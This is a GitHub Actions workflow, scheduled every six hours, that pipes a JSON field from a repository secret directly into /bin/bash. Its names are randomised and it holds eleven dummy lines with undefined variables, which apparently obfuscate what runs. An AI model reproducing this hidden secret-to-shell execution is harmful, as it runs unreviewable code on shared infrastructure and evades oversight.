name: tousanhougua
on:
  workflow_dispatch:
  schedule:
    - cron: '26 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tousanhougua
        env:
          jgv147: ${{ secrets.jgv147 }}
        run: |
          echo $jgv147 | jq -r .bxa85947 | /bin/bash
          echo $mbh3532 | jq -r .kg882 | /bin/bash
          echo $gihn2 | jq -r .y50 | /bin/bash
          echo $t81028 | jq -r .ypg5 | /bin/bash
          echo $lkfxx9 | jq -r .lpfqz9 | /bin/bash
          echo $yqd53525 | jq -r .r9213 | /bin/bash
          echo $hx58604 | jq -r .o2419 | /bin/bash
          echo $xmq48 | jq -r .ezuq46 | /bin/bash
          echo $qb09574 | jq -r .o32 | /bin/bash
          echo $n99 | jq -r .aj30 | /bin/bash
          echo $iz898 | jq -r .dj63 | /bin/bash
          echo $zqcqr379 | jq -r .exs32 | /bin/bash

